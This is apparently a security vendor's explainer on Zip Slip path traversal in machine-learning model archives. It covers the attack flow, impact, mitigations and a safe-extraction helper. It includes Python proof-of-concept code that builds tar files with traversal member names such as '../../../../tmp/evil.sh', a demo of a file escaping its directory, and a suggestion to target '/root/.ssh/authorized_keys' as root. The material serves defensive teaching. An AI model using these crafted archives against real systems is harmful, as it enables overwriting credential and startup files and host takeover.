Machine Learning Archive Zip Slip (Path Traversal) Threat
Overview
Machine learning models, particularly large foundational models or comprehensive frameworks containing thousands of weight files, are rarely distributed as single flat files. Hugging Face and cloud community hubs frequently bundle models using compressed archive formats (such as .zip, .tar.gz, or proprietary container packages) to simplify downloading.
Eresus Sentinel raises the PAIT-EXDIR-100 alert when it detects a malicious "Zip Slip" (path traversal) attempt embedded within an ML archive during extraction.
A Zip Slip vulnerability exploits an extraction library's failure to sanitize the file paths stored inside an archive before writing them to disk. By embedding directory traversal sequences (such as ../../../../) directly in the file names recorded in the .zip or .tar index, an attacker can force the extracting application to write files entirely outside the intended target directory.
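The traversal lives in the archive's index, not in any file content, so crafting a malicious package takes only a few lines. Below is a minimal, self-contained sketch using Python's standard `tarfile` module; the member name and payload are purely illustrative.

```python
import io
import tarfile

def build_zip_slip_tar() -> bytes:
    """Build an in-memory .tar whose single member tries to escape upward."""
    payload = b"echo attacker-controlled\n"
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        # The traversal sequence lives in the archive *index* entry,
        # not in any real file on the attacker's disk.
        info = tarfile.TarInfo(name="../../../../tmp/evil.sh")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()

# The stored member name carries the '../' sequences verbatim.
with tarfile.open(fileobj=io.BytesIO(build_zip_slip_tar())) as tar:
    names = tar.getnames()
print(names)  # ['../../../../tmp/evil.sh']
```

Any extractor that joins this member name to its destination directory without resolving and checking the result will write outside that directory.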
The Threat to MLOps Environments
When a data scientist runs a routine script to download and extract "Model-V2.tar.gz", the MLOps pipeline assumes all files will be safely extracted into /home/user/models/Model-V2/. However, if the archive contains a file path intentionally defined as ../../../../etc/passwd or ../../../../root/.ssh/authorized_keys, the poorly coded extraction utility will silently write directly to those operating system configuration paths, overwriting trusted security files on the host computer.
How The Attack Works
An attacker builds a weaponized model package and uploads it to an open repository. When internal corporate scripts pull the archive, the extraction stage silently overwrites critical host files.
```mermaid
sequenceDiagram
    participant Attacker
    participant Open_Model_Hub as Public Model Repository
    participant MLOps_Pipeline as Python Extraction Script
    participant OS_Filesystem as Victim's File System
    Attacker->>Attacker: Crafts malicious `.tar` with `../../` encoded file paths
    Attacker->>Open_Model_Hub: Distributes weaponized 'Llama-Adapter.tar.gz'
    MLOps_Pipeline->>Open_Model_Hub: Downloads the archive
    MLOps_Pipeline->>MLOps_Pipeline: `tarfile.extractall()` is called without path checks
    MLOps_Pipeline->>OS_Filesystem: Escapes the target directory via path traversal
    MLOps_Pipeline->>OS_Filesystem: Overwrites `/bin/bash` or `~/.bashrc` with malware
    OS_Filesystem-->>Attacker: Malware triggers the next time the user logs into the server
```
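This sequence can be reproduced safely against throwaway directories: the extracted file lands one level above the intended target. This is a hedged sketch, not a real attack; `filter="fully_trusted"` replicates the legacy unchecked behavior on Python versions that support the `filter` argument (newer interpreters default to the safer `"data"` filter, which rejects traversal).

```python
import io
import os
import tarfile
import tempfile

# Build a tar whose member climbs one level above the extraction directory.
payload = b"echo pwned\n"
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    info = tarfile.TarInfo(name="../escaped.sh")
    info.size = len(payload)
    tar.addfile(info, io.BytesIO(payload))
buf.seek(0)

root = tempfile.mkdtemp()
target = os.path.join(root, "models", "Model-V2")
os.makedirs(target)

with tarfile.open(fileobj=buf) as tar:
    try:
        # 'fully_trusted' replicates the historical unchecked extraction.
        tar.extractall(path=target, filter="fully_trusted")
    except TypeError:
        # Older Pythons without the filter argument were unchecked by default.
        tar.extractall(path=target)

inside = os.path.exists(os.path.join(target, "escaped.sh"))
outside = os.path.exists(os.path.join(root, "models", "escaped.sh"))
print(inside, outside)  # the file escaped the target directory entirely
```

Swap the harmless `../escaped.sh` for `../../../../root/.ssh/authorized_keys` and run the script as root, and the overwrite lands on a live credential file.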
Key Points
- Automated Destruction: MLOps pipelines frequently utilize automated scheduled jobs to pull fresh weights from data lakes every single night. A single poisoned update file can stealthily overwrite credentials across massive cloud training environments.
- Bypasses Tensor Validation: Tools that exclusively scan `.pt` or `safetensors` contents completely ignore the archive container itself, missing the Zip Slip payload because extraction happens before tensor loading.
- Root-Level Consequences: If the script orchestrating the extraction runs with elevated root or Docker administrative access, the overwritten binaries can compromise the entire host.
Impact
Zip Slip attacks inside ML model archives lead directly to host takeover or arbitrary code execution (ACE) later in the deployment cycle. By choosing which critical OS files to replace, attackers can silently inject rogue Python scripts into standard execution paths. When the server legitimately invokes a known script (such as a routine health check), it inadvertently executes the attacker's dropped malware, resulting in sustained data exfiltration, cryptojacking, or secondary ransomware detonation.
Best Practices
- Sanitize Before Extraction: Refuse to use generic, unsanitized extraction calls like `tarfile.extractall()`, which inherently trusts the archive's structure. Force all scripts to validate each `tarinfo.name` against the `os.path.abspath` of the target destination, ensuring no file breaks the directory scope.
- Principle of Least Privilege (PoLP): Run extraction software under tightly limited user accounts. A script running as `ml_worker` inherently cannot overwrite root-owned files in `/etc/` or `/bin/`, neutralizing the most dangerous Zip Slip variants.
- Trust Immutability: Never automatically pull undocumented dynamic archive tags from external repositories. Adopt strict version pinning alongside hard-coded SHA-256 checksum verification so only known, approved archives pass your security barrier.
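The sanitize-before-extraction practice can be sketched as a wrapper that resolves every member path and refuses anything that escapes the destination. This is an illustrative helper under stated assumptions, not Eresus Sentinel's implementation; on Python 3.12+, the built-in `tar.extractall(filter="data")` provides similar protection.

```python
import io
import os
import tarfile
import tempfile

def safe_extract(tar: tarfile.TarFile, dest: str) -> None:
    """Extract only if every member's resolved path stays inside dest."""
    dest_root = os.path.realpath(dest)
    for member in tar.getmembers():
        member_path = os.path.realpath(os.path.join(dest_root, member.name))
        # realpath collapses '../' segments; commonpath confirms containment.
        if os.path.commonpath([dest_root, member_path]) != dest_root:
            raise ValueError(f"blocked path traversal: {member.name!r}")
    tar.extractall(path=dest_root)

# Demo: a traversal member is rejected before anything touches the disk.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    tar.addfile(tarfile.TarInfo(name="../../outside.txt"), io.BytesIO(b""))
buf.seek(0)

blocked = ""
with tarfile.open(fileobj=buf) as tar:
    try:
        safe_extract(tar, tempfile.mkdtemp())
    except ValueError as exc:
        blocked = str(exc)
print(blocked)
```

Validating all members before writing anything means a partially malicious archive leaves zero files on disk, rather than failing halfway through.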
Remediation
If an Eresus Sentinel PAIT-EXDIR-100 alert fires, a path traversal write attempt was halted. Immediately pause the script or CI/CD worker responsible for the extraction phase. Audit the extracted paths in your system logs with forensic tooling to determine whether any .bashrc, .profile, or foundational cron tasks were compromised before the intervention. Blocklist the repository that supplied the archive and rebuild pristine Docker images for the affected pipeline nodes.
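A first-pass triage of the startup and cron paths named above can be scripted. The watchlist and 24-hour window below are illustrative assumptions for a quick sweep, not a substitute for proper forensic tooling.

```python
import time
from pathlib import Path

# Hypothetical watchlist of commonly targeted startup and cron paths.
WATCHLIST = ["~/.bashrc", "~/.profile", "/etc/crontab", "/etc/cron.d"]

def recently_modified(paths, window_seconds=24 * 3600, now=None):
    """Return watched paths whose mtime falls inside the audit window."""
    now = time.time() if now is None else now
    hits = []
    for raw in paths:
        path = Path(raw).expanduser()
        if path.exists() and now - path.stat().st_mtime < window_seconds:
            hits.append(str(path))
    return hits

# Example: flag anything on the watchlist touched in the last 24 hours.
suspicious = recently_modified(WATCHLIST)
```

Any hit should be diffed against a known-good baseline before the host is returned to service.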
Further Reading
Understand the fundamental technical mechanisms of Zip Slip within software networks:
- OWASP Path Traversal Frameworks: Comprehensive security fundamentals explaining how directory bypasses weaponize backend inputs.
- Snyk Zip Slip Exploitation Analysis: The definitive industry research uncovering widespread use of vulnerable extraction code across standard libraries.
- Python Security - `tarfile` module: Official documentation detailing the exact dangers associated with `.extractall()`.
📥 Eresus Sentinel Scans ML Packages Before They Touch The Disk
A poisoned archive can destroy your local inference servers before your standard security tools even begin tensor validation. Eresus Sentinel preemptively analyzes the metadata structures of compressed Model archives, permanently blocking hidden directory traversal paths (../../) from detonating on your filesystem. Defend your environment with precision.
FAQ
Is this risk limited to prompt injection?
No. In AI security, prompt injection is an important starting point, but on its own it does not tell the whole story. The retrieval layer, tool permissions, trust in model artifacts, sensitive data in logs, user authorization, and integration boundaries must all be evaluated together.
What should the first technical control be?
First, map which data the system can access, which actions it can take, and under which identity those actions run. Without this map, testing rarely goes beyond a handful of prompt attempts.
When is professional support needed?
If the AI application touches customer data, internal documents, production APIs, or agent flows that take automated actions, a professional security review is required. At that point the risk is no longer the model's answer but the organization's internal authorization and data boundaries.